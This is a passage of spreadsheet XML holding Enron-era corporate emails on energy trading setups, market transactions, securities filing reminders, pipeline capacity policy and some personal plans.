To: Cheryl Slone/EPSC/HOU/ECT, Shellyo15@cs.com, Amanda Talbot/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Too Precious!!!! [Attachments have been scanned for viruses.]_x000D_
_x000D_
_x000D_
_x000D_
 - gift.jpg_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 20 Jan 2002 19:13:21 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'susan_j_neel@reliantenergy.com'})</t>
  </si>
  <si>
    <t>frozenset({'bagross@aep.com'})</t>
  </si>
  <si>
    <t>Re: premise address changes</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 Not sure I agreed with you answer.  However, TxSET will give an answer in the minutes.  Please look to the TxSET minutes for the answer from the committee.  THANKS_x000D_
bagross@aep.com_x000D_
01/18/2002 12:28 PM_x000D_
To: slmckain@aep.com_x000D_
cc: set@ercot.com_x000D_
bcc: _x000D_
Subject: Re: premise address changes_x000D_
Shelley, the market left the 814_PC transaction (Maintain customer Information request) in place so that the CR could notify the TDSP when changes like the one you mention were necessary.  It is a point to point transaction from the CR to the TDSP. _x000D_
Blake A. Gross_x000D_
AEP Business Standards Consultant_x000D_
Phone: 918.594.4022_x000D_
Fax: 918.594.3969_x000D_
WT2-Tulsa 6S-426_x000D_
Audinet: 8.700.4022_x000D_
bagross@aep.com _x000D_
[IMAGE]	  slmckain@aep.com   01/18/2002 08:48 AM   	                  To:        set@ercot.com          cc:                  Subject:        premise address changes  	_x000D_
_x000D_
_x000D_
Is there a standard process for each TDSP on how CR's should handle notifying a TDSP if they are aware that a premise address needs to be changed? _x000D_
Couple of examples below. _x000D_
A customer is notified by the post office that the post office is changing their premise address and they call their CR to notify them in order to recieve their bill correctly. _x000D_
CR receives information from return mail processing, etc, that a premise address should be changed.   _x000D_
The 814_20 is for communications from the TDSP to Ercot to the CR, but does not provide for communication back the other way.  Should the customer be directed to the TDSP phone centers or what is the best means to communicate these change requests?   _x000D_
Shelley McKain_x000D_
AEP Retail Operations_x000D_
Retail Business Consultant_x000D_
(918) 493-9515  Fax (918)594-3328 </t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 05:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Friday Night Plans</t>
  </si>
  <si>
    <t xml:space="preserve">Hi There!_x000D_
_x000D_
Here's the scoop on Friday night.  I have attached the "e mail" I received in _x000D_
case you are wondering what's going on.  I reserve the right to blow it all _x000D_
off and go to dinner or whatever we feel like, OK!  _x000D_
_x000D_
It was great up at Lake Conroe this last weekend.  Weather was perfect.  It _x000D_
was even warm enough to go out on the wave runners.  This weekend should be _x000D_
even better!  _x000D_
_x000D_
I might go to Las Vegas tonight .  A friend was served with divorce papers _x000D_
today and is not doing real well and wants to go for 24 hours.  We would have _x000D_
to be back Wednesday night since he has to be over in Louisiana Thursday.  If _x000D_
I go what number do you want me to bet for you on roulette?  I would have _x000D_
said 38 but that's to high a number, (JUST KIDDING)   Your laughing , right!  _x000D_
Its not really a great time since I have such a large position, but Its _x000D_
something I need to do.  I would appreciate it if you did not say anything _x000D_
about Las Vegas here at work since Im not sure how much Im going to tell _x000D_
everyone._x000D_
_x000D_
Im looking forward to Friday night!_x000D_
Don't forget your number for roulette._x000D_
_x000D_
 Jim_x000D_
_x000D_
---------------------- Forwarded by Jim Schwieger/HOU/ECT on 04/03/2001 11:38 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Boyd, Bruce" &lt;Bruce_Boyd@kindermorgan.com&gt; on 03/21/2001 10:48:16 AM_x000D_
To: "'jim_schwieger@enron.com'" &lt;jim_schwieger@enron.com&gt;_x000D_
cc:  _x000D_
Subject: FW: Invitation to April 6th Customer Appreciation Party_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt;  -----Original Message-----_x000D_
&gt; From:  Boyd, Bruce_x000D_
&gt; Sent: Wednesday, March 21, 2001 10:11 AM_x000D_
&gt; To: 'jim_schweiger@enron.com'; 'cannon2@flash.net'_x000D_
&gt; Subject: Invitation to April 6th Customer Appreciation Party_x000D_
&gt;_x000D_
&gt; Jim and Patrick:_x000D_
&gt;_x000D_
&gt; Kevin P. and I cordially invite you and your significant other to our party _x000D_
on April_x000D_
&gt; 6. Hope ya'll can make it._x000D_
&gt;_x000D_
&gt;  &lt;&lt;Invitation.ppt&gt;&gt;  &lt;&lt;Heights Firestation Map.ppt&gt;&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
 - Invitation.ppt_x000D_
 - Heights Firestation Map.ppt_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 09:43:39 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'adam.giannone@enron.com'})</t>
  </si>
  <si>
    <t>RE: where are u?</t>
  </si>
  <si>
    <t>We had a group meeting this morning.  Pretty interesting!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Giannone, Adam  _x000D_
Sent:	Monday, November 19, 2001 11:33 AM_x000D_
To:	Taylor, Michael E_x000D_
Subject:	RE: where are u?_x000D_
_x000D_
i am in Charleston WV until Thanksgiving.  Then I am going to NY.  Please tell the soccer crew that I can not make it tomarrow._x000D_
_x000D_
thanks_x000D_
AG_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Taylor, Michael E  _x000D_
Sent:	Monday, November 19, 2001 11:39 AM_x000D_
To:	Giannone, Adam_x000D_
Subject:	where are u?_x000D_
_x000D_
Adam,_x000D_
_x000D_
Are you in today or this week?_x000D_
_x000D_
Mike</t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 02:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dfincher@utilicorp.com'})</t>
  </si>
  <si>
    <t>hey big guy.....check this out....._x000D_
_x000D_
 w ww.gorelieberman-2000.com/</t>
  </si>
  <si>
    <t>Fri, 18 Jan 2002 14:56:42 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/18/02; HourAhead hour: 13;  HourAhead schedule download failed. Manual intervention required.</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 09:31:47 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cindy.hudler@enron.com', 'chip.schneider@enron.com', 'tanya.rohauer@enron.com', 'sarah.wesner-soong@enron.com', 'harlan.murphy@enron.com'})</t>
  </si>
  <si>
    <t>FW: BNP Paribas Deals</t>
  </si>
  <si>
    <t>fyi_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Roderick  _x000D_
Sent:	Monday, November 19, 2001 11:25 AM_x000D_
To:	Heard, Marie; Shackleton, Sara_x000D_
Subject:	FW: BNP Paribas Deals_x000D_
_x000D_
[1] ECTRL and BNP Paribas - Physical Gas Trading:  The attached are confirms (for phone executed and EOL executed trades) which covers all physical gas trading in Europe. (Info provided by Pavi Sale in UK gas documentation, 44 207 783 2347, if you have further questions.)_x000D_
_x000D_
Phone deal	EOL deal	_x000D_
  _x000D_
[2] ECL and BNP Paribas - Credit Default Swap Trading:  Blair Van Zant (RAC-Credit) will fax the schedules of the ISDA which governs this trading. (Please call Blair direct at 44 207 783 6571 if you do not receive within the half-hour.)_x000D_
_x000D_
[3] EML and BNP Paribas - Metals Trading:  Simon Hockenhull (RAC-Credit) is investigating.  Probably confirmed under GTC for financial metal trading.  May not have today.</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 02:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: New Broker: Automated Power Exchange</t>
  </si>
  <si>
    <t xml:space="preserve">Did Chris Foster ever get back to you on this? I had asked him to let you _x000D_
know when he found out, but I wanted to make sure the information actually _x000D_
got passed along. Let me know when you get a moment._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Rhonda L Denton_x000D_
04/20/2001 06:16 AM_x000D_
To: Kate Symes/PDX/ECT@ECT, Melissa Ann Murphy/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: New Broker: Automated Power Exchange_x000D_
_x000D_
FYI.  Please let us know if we will be receiving broker paper in Houston or _x000D_
will it come to Portland?_x000D_
---------------------- Forwarded by Rhonda L Denton/HOU/ECT on 04/20/2001 _x000D_
08:15 AM ---------------------------_x000D_
_x000D_
_x000D_
Jason Moore_x000D_
04/20/2001 08:10 AM_x000D_
To: Rhonda L Denton/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: New Broker: Automated Power Exchange  _x000D_
_x000D_
The counterparty has been linked to the Power Broker - Houston Group._x000D_
_x000D_
Jason Moore_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Rhonda L Denton_x000D_
04/19/2001 04:16 PM_x000D_
To: Jason Moore/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: New Broker: Automated Power Exchange_x000D_
_x000D_
Please link this CP to Enpower with group link of Power Broker-Houston.  _x000D_
Please let me know when completed.  Thanks._x000D_
---------------------- Forwarded by Rhonda L Denton/HOU/ECT on 04/19/2001 _x000D_
04:15 PM ---------------------------_x000D_
   Kate Symes                04/19/2001 03:25 PM_x000D_
_x000D_
To: Melissa Ann Murphy/HOU/ECT@ECT, Rhonda L Denton/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: New Broker: Automated Power Exchange_x000D_
_x000D_
P.S. I mentioned this to you, Melissa. But just a reminder that we need the _x000D_
default broker fee on this to be $.03._x000D_
_x000D_
Thank you!_x000D_
---------------------- Forwarded by Kate Symes/PDX/ECT on 04/19/2001 01:32 PM _x000D_
---------------------------_x000D_
   Kate Symes                04/19/2001 01:20 PM_x000D_
_x000D_
To: Melissa Ann Murphy/HOU/ECT@ECT, Rhonda L Denton/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: New Broker: Automated Power Exchange_x000D_
_x000D_
Chris Foster has requested that we set up a new broker - the Automated Power _x000D_
Exchange, in EnPower. It is the same counterparty we already have in EnPower, _x000D_
with the same name and contact information. Melissa, I believe you said we _x000D_
could pretty easily add the name in the broker list if it was the same as in _x000D_
the counterparty list, which Chris has verified it is. Please let me know if _x000D_
you need anymore information._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 16:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rguttroff@amanet.org'})</t>
  </si>
  <si>
    <t>How to Maximize the Value of Your Company's Intellectual Property</t>
  </si>
  <si>
    <t xml:space="preserve">From: Rick Guttroff, AMA Center for Legal Management_x000D_
_x000D_
Dear Jeffrey K. Skilling:_x000D_
_x000D_
In New York City, next Monday and Tuesday, May 14 and 15, you have an_x000D_
unprecedented opportunity to discover tangible ways to maximize the value_x000D_
of your company's intellectual property.  Learn how to_x000D_
_x000D_
? Use your IP to increase stockholder value,_x000D_
? Determine the value of your IP to outside markets,_x000D_
? Assess your IP value against the costs to exploit it,_x000D_
? Handle your IP without risk of infringement,_x000D_
? Balance business priorities while preserving IP rights_x000D_
? Turn today's IP challenges into tomorrow's profits._x000D_
_x000D_
For 75 years the American Management Association has been showing companies_x000D_
how to adapt to changing business environments.  With this conference, we_x000D_
do it again!  Register today and help your company find its hidden IP_x000D_
wealth!  Call 1-800-262-9699 for details and to register._x000D_
_x000D_
Complex technological innovations coupled with a proliferation of_x000D_
intellectual property rights have brought the rich potential of IP to the_x000D_
forefront in corporations throughout the world.  Many have discovered_x000D_
competitive advantage in their once-hidden IP assets.  This seminar_x000D_
provides a practical framework for understanding the array of issues_x000D_
surrounding intellectual property and how to turn that knowledge into_x000D_
corporate profits._x000D_
_x000D_
Showing the way will be IP expert lawyers from New York's premier IP law_x000D_
firm Fish &amp; Neave.  Corporate executives, come and learn; Corporate_x000D_
executives, send your in-house lawyers.  The cutting edge of intellectual_x000D_
property law and strategy will be on display at this conference!_x000D_
_x000D_
Register yourself for $1,595 and bring a colleague for only $395!  Call_x000D_
1-800-262-9699 today._x000D_
We look forward to seeing you at the IP Strategies to Enhance Corporate_x000D_
Profitability conference in New York next week._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Rick Guttroff, Director_x000D_
Center for Legal Management_x000D_
American Management Association_x000D_
_x000D_
P.S.  Please forward this information to others in your company with_x000D_
responsibility of your IP assets.  You can send as many colleagues as you_x000D_
like for the $395 discount registration!_x000D_
_____________x000D_
Meeting No:  7210-6F6-001_x000D_
Meeting Dates:   May 14-15, 2001_x000D_
Meeting Locale:   AMA Executive Conference Center_x000D_
    1601 Broadway, 8th Floor,  New York. NY_x000D_
_____________x000D_
PLEASE PROVIDE THIS INFORMATION_x000D_
WHEN YOU CALL TO REGISTER_x000D_
_x000D_
First Registrant (at $1,595):_x000D_
Additional Registrants (at $395):_x000D_
Company:_x000D_
Address:_x000D_
City:_x000D_
State:_x000D_
Zip Code:_x000D_
Phone:_x000D_
E-mail:_x000D_
_x000D_
Payment Instructions/ Options_x000D_
Bill me  [  ]_x000D_
Bill company [  ]_x000D_
Charge to_x000D_
  Visa   [  ]_x000D_
  MC    [  ]_x000D_
  Amex  [  ]_x000D_
  Optima     [  ]_x000D_
  Discover   [  ]_x000D_
  Diners      [  ]_x000D_
  Carte Blanche [  ]_x000D_
</t>
  </si>
  <si>
    <t>Fri, 25 May 2001 04:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'edward.baughman@enron.com', 'oscar.dalton@enron.com', 'jeff.ader@enron.com', 'mark.bernstein@enron.com'})</t>
  </si>
  <si>
    <t>Wabash- Business Opportunity and Misc.</t>
  </si>
  <si>
    <t>Mike Roan and I met with Ed Martin, president of Wabash and Don Morton, his _x000D_
legal counsel to discuss their support for our RTO position.  (Mike did a _x000D_
nice job and I believe they will be supportive)._x000D_
_x000D_
On the business side, Ed Martin would like to talk to someone from Enron to _x000D_
partner with them on a deal.  They have a load management device that can be _x000D_
installed in air conditioners (they are meeting with Lenox about this) and _x000D_
they need a partner to market it this to utilities as a means of reducing _x000D_
peak load and making power available for resale.  The product is geared _x000D_
towards the residential , but could be applicable to small, medium commercial _x000D_
customers and in some cases (depending on utility tariffs and what is _x000D_
available), larger customers.  The other angle would be to market this _x000D_
directly to customers, although that does not appear to be their focus.  I _x000D_
told Ed I would have someone get back to him.  Please advise if you are _x000D_
interested._x000D_
_x000D_
Thanks,_x000D_
Janine_x000D_
_x000D_
p.s.  You probably know this, but just in case, according to Ed , TVA is _x000D_
getting squeezed by Duke and Southern and is quietly lobbying folks like the _x000D_
Coops to raise the issue of increasing transmission capacity by building _x000D_
additional transmission lines to better inteconnect the system.</t>
  </si>
  <si>
    <t>Thu, 10 Aug 2000 03:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Stanlet Statement</t>
  </si>
  <si>
    <t xml:space="preserve">I think this looks good and is more than sufficient. Thanks._x000D_
_x000D_
_x000D_
To: Richard Shapiro/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Stanlet Statement_x000D_
_x000D_
Attached is a version of the Stanley statement which I have revised following _x000D_
our discussion with Glenn Leslie.  As I looked at it, I didn't think that any _x000D_
changes to the text were  required and that what was needed was an _x000D_
introductory note explaining the purpose and intended use of the statement.  _x000D_
Let me know what you think and if you think any further changes are needed.  _x000D_
Thanks, Aleck_x000D_
---------------------- Forwarded by Aleck Dadson/TOR/ECT on 08/10/2000 11:47 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Lisa Ramsay_x000D_
08/10/2000 12:41 PM_x000D_
To: Aleck Dadson/TOR/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
_x000D_
_x000D_
I hope this one is okay._x000D_
_x000D_
Lisa._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 07:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>I changed this deal, by the way. Please let me know if the broker thinks he's _x000D_
wrong.</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 06:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: US MTBE Fin Swap</t>
  </si>
  <si>
    <t xml:space="preserve">Ditto Tom._x000D_
_x000D_
_x000D_
_x000D_
	Lisa Lees_x000D_
	12/12/2000 02:40 PM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT_x000D_
		 cc: Tom Moran/HOU/ECT@ECT_x000D_
		 Subject: US MTBE Fin Swap_x000D_
_x000D_
Tana/Karen:_x000D_
_x000D_
The product long description described below will fall under the new product _x000D_
type US MTBE Fin Swap.  Tom Moran has approved copying the profiles for the _x000D_
new product type from the following:_x000D_
_x000D_
US Jet Kero Financial Swap_x000D_
_x000D_
Please respond no later than 10 a.m. on Wednesday, December 13._x000D_
_x000D_
Thank you._x000D_
---------------------- Forwarded by Lisa Lees/HOU/ECT on 12/12/2000 01:36 PM _x000D_
---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Kevin Meredith @ ENRON                           12/11/2000 01:34 PM_x000D_
	_x000D_
_x000D_
To: Mark Taylor/HOU/ECT@ECT, Jeff Blumenthal/HOU/ECT@ECT, Stephen H _x000D_
Douglas/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, Rudi Zipter/HOU/ECT@ECT, Bjorn _x000D_
Hagelmann/HOU/ECT@ECT, John Swinney/HOU/ECT@ECT_x000D_
cc: Lisa Lees/HOU/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, Melba _x000D_
Lozano/HOU/ECT@ECT, Jason Althaus/Corp/Enron@Enron, Robert B _x000D_
Cass/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT _x000D_
Subject: NEW ENRONONLINE PRODUCT - PLEASE APPROVE_x000D_
_x000D_
Your review and approval of the following two product type in the EOL _x000D_
Datamanager is needed (for directions on approval , please see steps for _x000D_
approval at the bottom of this e-mail).  _x000D_
_x000D_
Trader: Larry Gagliardi_x000D_
_x000D_
Note: The actual Sigma Factor for this product is $1.62.  Once the product _x000D_
has been approved, the existing Sigma Factor will be corrected._x000D_
_x000D_
Example:_x000D_
_x000D_
US MTBE Swap   Platts GC WB  Mo/Yr  USD/Gl-b_x000D_
_x000D_
New Product TypeCommodity:  _x000D_
Product Type:   US MTBE Fin Swap_x000D_
Commodity: MTBE _x000D_
Currency:     USD_x000D_
Default UOM:   Barrels_x000D_
Country:   USA_x000D_
_x000D_
Financial Description :_x000D_
A US Methyl Tertiary Butyl Ether (M.T.B.E.) financial Swap Transaction with _x000D_
Enron North America Corp. under which the Seller pays a Floating Price and _x000D_
the Buyer pays the price submitted by Counterparty on the website (the Fixed _x000D_
Price) in each case in respect of the Notional Quantity per Determination _x000D_
Period. The Notional Quantity per Determination Period shall be the volume _x000D_
submitted by Counterparty on the website. Each calendar month during the term _x000D_
of the Transaction will be a Determination Period; provided, that in the _x000D_
event the term of the Transaction is less than one month, the term of the _x000D_
Transaction shall be the Determination Period. The Payment Date(s) will be 5 _x000D_
business days after the Floating Price is determinable. The Floating Price _x000D_
shall be the Index for the relevant Determination Period._x000D_
_x000D_
The term of the Transaction shall be from the Effective Date of 01 Dec 2000 _x000D_
to the Termination Date of 31 Dec 2000._x000D_
_x000D_
The Index for a Determination Period shall be the arithmetic average of the _x000D_
mean of the daily high and low quotations for M.T.B.E. located in the talbe _x000D_
entitled "Product Price Assessments:  U.S. Gulf Coast:  Waterborne:  c/Gal:  _x000D_
MTBE" for those issues of Platt's Oilgram Price Report published for the  _x000D_
applicable Determination Period._x000D_
_x000D_
The price is quoted in US Dollars per unit of volume, which will be the _x000D_
Contractual Currency._x000D_
_x000D_
The unit of measure against which the price is quoted shall be gallons and _x000D_
the volume shown shall be in total number of Barrels (42 US Gallons) per _x000D_
month.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Thanks - Rob Cass  -  Melba Lozano - Kevin Meredith_x000D_
                   x35491           x58986                  x39555_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 27 Oct 2001 12:07:48 -0700 (PDT)</t>
  </si>
  <si>
    <t>Savita:_x000D_
I'm going to need an additional report daily for the next couple weeks: for the top 50 counterparties a summary of total EOL volumes and phys gas volumes for average of rolling 30 days, average of rolling 5 days, and previous day with volume differentials in percent relative to 30 day average.  For instance :_x000D_
_x000D_
_x000D_
TOTAL VOLUMES	_x000D_
		Previous day		5 day			30 day_x000D_
Aquilla		240  	-20%		330	+10%		300_x000D_
El Paso		275 	+10%		200	-20%		250_x000D_
_x000D_
_x000D_
US GAS PHYS FWD FIRM &lt;= 1 MONTH_x000D_
_x000D_
				BUY							SELL_x000D_
		Previous day		5 day			30 day		Previous day		5 day			30 day_x000D_
Aquilla		24  	-20%		33	+10%		30		16  	-20%		24	+20%		20	_x000D_
El Paso		30 	+20%		20	-20%		25		5 	-50%		10	0		10_x000D_
_x000D_
_x000D_
Please advise how quickly you can put this together.</t>
  </si>
  <si>
    <t>Wed, 3 Nov 1999 07:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lynn.aven@enron.com'})</t>
  </si>
  <si>
    <t>Risk Management &amp; Trading Corp. ("RMT") Guidelines</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Sara Shackleton/HOU/ECT on 11/03/99 03:51 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Rhett Jackson_x000D_
11/01/99 10:08 AM_x000D_
To: Sally Beck/HOU/ECT@ECT, Dale Neuner/HOU/ECT@ECT, Peter _x000D_
Keohane/CAL/ECT@ECT, Sara Shackleton/HOU/ECT@ECT, Jefferson D _x000D_
Sorenson/HOU/ECT@ECT, Shari Stack/HOU/ECT@ECT, Carol St Clair/HOU/ECT@ECT, _x000D_
Mark Taylor/HOU/ECT@ECT, Bob Shults/HOU/ECT@ECT, Tony Harris/HOU/ECT@ECT_x000D_
cc: Morris Richard Clark/HOU/ECT@ECT, Stephen H Douglas/HOU/ECT@ECT, James _x000D_
Ginty/Corp/Enron@ENRON, Jordan Mintz/HOU/ECT@ECT, James Sandt/LON/ECT@ECT, _x000D_
AnnMarie Tiller/Corp/Enron@ENRON _x000D_
Subject: Risk Management &amp; Trading Corp. ("RMT") Guidelines_x000D_
_x000D_
Attached please find the most recent guidelines for confirming swap _x000D_
transactions with RMT.  Please distribute this memorandum to others involved _x000D_
in the confirmation process, as appropriate, and feel free to call me at _x000D_
X34718 if you have any questions or comments._x000D_
_x000D_
Regards._x000D_
Rhett Jackson_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 14 Aug 2000 09:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FERC Conference Call</t>
  </si>
  <si>
    <t>1-800-473-8795_x000D_
Linda Grant  713-627-4601</t>
  </si>
  <si>
    <t>Thu, 20 Apr 2000 07:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Form 4 Reminder for April</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Steve,_x000D_
_x000D_
I am not aware of any transactions such as stock option exercises, etc. which _x000D_
have to be reported by May 10._x000D_
_x000D_
Thanks for focusing on this matter each month._x000D_
_x000D_
Elaine_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Steven J Kean@EES_x000D_
04/20/2000 11:52 AM_x000D_
To: Elaine Overturf/Corp/Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Form 4 Reminder for April_x000D_
_x000D_
do I need to do anything?  I believe the only transaction I had was related _x000D_
to a set of shares which were released to me earlier in the year.  Some of _x000D_
the shares were sold at that time to pay the income tax on the distribution.  _x000D_
We discussed this before and my recollection is I did not have to make a _x000D_
filing.  Could you confirm by e-mail?_x000D_
---------------------- Forwarded by Steven J Kean/HOU/EES on 04/20/2000 11:50 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Rebecca Carter@ENRON_x000D_
04/20/2000 09:58 AM_x000D_
Sent by: Kelly Johnson@ENRON_x000D_
To: Kenneth Lay/Corp/Enron@ENRON, Jeff Skilling/Corp/Enron@ENRON, Joseph W _x000D_
Sutton/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, rebecca _x000D_
mark-jusbasche/HOU/AZURIX@Azurix, Ken Harrison/Enron@Gateway, Cliff _x000D_
Baxter/HOU/ECT@ECT, Mark Frevert/LON/ECT@ECT, Joe Hirko/Enron _x000D_
Communications@Enron Communications, Stanley Horton/Corp/Enron@Enron, Ken _x000D_
Rice/Enron Communications@Enron Communications, Lou L Pai/HOU/EES@EES, Rick _x000D_
Buy/HOU/ECT@ECT, Richard Causey/Corp/Enron@ENRON, James _x000D_
Derrick/Corp/Enron@ENRON, Andrew S Fastow/HOU/ECT@ECT, Steven J _x000D_
Kean/HOU/EES@EES, Mark Koenig/Corp/Enron@ENRON, Mike McConnell/HOU/ECT@ECT, _x000D_
Jeffrey McMahon/HOU/ECT@ECT, J Mark Metts/NA/Enron@Enron, Cindy _x000D_
Olson/Corp/Enron@ENRON_x000D_
cc: Rosalee Fleming/Corp/Enron@ENRON, Sherri Sera/Corp/Enron@ENRON, Pam _x000D_
Benson/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Marsha Lindsey/HOU/AZURIX@AZURIX, _x000D_
Dolly Henrici/Enron@Gateway, Susan Skarness/HOU/ECT@ECT, Nicki _x000D_
Daw/LON/ECT@ECT, Nancy Young/Enron Communications@Enron Communications, Cindy _x000D_
Stark/Corp/Enron@ENRON, Dorothy Dalton/Enron Communications@Enron _x000D_
Communications, Karen Owens/HOU/EES@EES, Karen K Heathman/HOU/ECT@ECT, _x000D_
Sharron Westbrook/Corp/Enron@ENRON, Stephanie Harris/Corp/Enron@ENRON, _x000D_
Bridget Maronge/HOU/ECT@ECT, Maureen McVicker/HOU/EES@EES, Joannie _x000D_
Williamson/Corp/Enron@ENRON, Cathy Phillips/HOU/ECT@ECT, Sue _x000D_
Ford/HOU/ECT@ECT, Dolores Fisher/NA/Enron@Enron, Bobbie _x000D_
Power/Corp/Enron@ENRON _x000D_
Subject: Form 4 Reminder for April_x000D_
_x000D_
please open the attached document._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 27 Sep 2000 05:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'christopher.long@enron.com'})</t>
  </si>
  <si>
    <t>Nymex</t>
  </si>
  <si>
    <t xml:space="preserve">Chris,_x000D_
_x000D_
Here is the analysis you requested.    Let me know if I can be of any further _x000D_
assistance._x000D_
_x000D_
Charlie Weldon_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Mar 2001 04:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>TransCanada Shipper Settlement -- Impact to Sithe/Independence_x000D_
 Restructuring</t>
  </si>
  <si>
    <t>As we discussed yesterday, the TCPL Mainline Service and Pricing Settlement _x000D_
language_x000D_
on the proposed Capacity Turnback Policy may be very important feature of the _x000D_
Settlement_x000D_
if ENA ends up reducing its sale to the plant and is responsible for _x000D_
mitigating the cost of Sithe's_x000D_
transportation upstream of Chippawa.  The other features such as FT Make-Up _x000D_
Credits and AOS_x000D_
Credits on Sithe's transport will create new opportunities to generate _x000D_
incremental revenues for_x000D_
ENA and Sithe.  The IT Floor Price  will directly impact the "death spiral" _x000D_
of future capacity _x000D_
decontracting and resulting increased demand charges for Sithe if the IT _x000D_
Floor is placed below_x000D_
100% of firm tolls.  _x000D_
_x000D_
Here are some additional comments and questions on the draft language on _x000D_
TCPL's _x000D_
Turnback Policy:_x000D_
_x000D_
1) Policy is good only through December 31, 2002, the ending date of the _x000D_
Settlement._x000D_
 There are a couple pipeline expansions (i.e. Iroquois' Eastchester and a _x000D_
rumored_x000D_
 alternative to the Canadian portion of Millenium) that have a Fall 2003 _x000D_
in-service_x000D_
 date.  Will TCPL's "queue" for new capacity kick-off the Turnback Policy?  _x000D_
Is there_x000D_
 a requirement that TCPL's upstream capacity match up with takeaway capacity _x000D_
in_x000D_
 the U.S., for example Iroquois's 230,000 dth/d Eastchester project.  Sithe's _x000D_
capacity_x000D_
 may only partially prevent an additional expansion from Dawn to Waddington._x000D_
 Sithe's capacity, however, would have higher value if the rumored Dawn to _x000D_
Niagara_x000D_
 expansion alternative to Millenium becomes a reality.  Can the language be _x000D_
clarified_x000D_
 so that we don't lose out on turning back Sithe's capacity if an expansion _x000D_
project_x000D_
 does not quite hit the deadline of December 31, 2002?_x000D_
_x000D_
2) Requests for Turnback to be only posted on TCPL's bulletin board.  Can _x000D_
TCPL be_x000D_
 required to make a written notification to all FT shippers?  What will be _x000D_
the minimum_x000D_
 amount of time that shipper will have to prepare turnback bids?  Several _x000D_
weeks to _x000D_
 a month is typical for U.S. pipelines and can occur simultaneously during _x000D_
the Open_x000D_
 Season for the expansions._x000D_
_x000D_
3) Existing FT shippers along the path on the Mainline System being expanded _x000D_
may_x000D_
 offer to turnback all, or a portion of, their FT contracts.  What criteria _x000D_
and who _x000D_
 determines the path to be expanded?  If a downstream expansion project is for_x000D_
 10 years, what if TCPL only needs to expand for the first couple of years _x000D_
and then_x000D_
 there is more turnback?  It just seems that there is so much TCPL discretion _x000D_
on the_x000D_
 bid and evaluation process?  Could some guidelines or goals established ahead_x000D_
 of time, in addition to the highest NPV process, that would direct how some _x000D_
of these_x000D_
 decisions are made?_x000D_
_x000D_
4) FT Shippers can turnback capacity on a permanent or temporary basis.  Is _x000D_
this _x000D_
 the approach that TCPL is proposing to handle that capacity is only needed _x000D_
for  _x000D_
 say 10 years to match up with Iroquois' Eastchester project?  In the U.S. _x000D_
shippers_x000D_
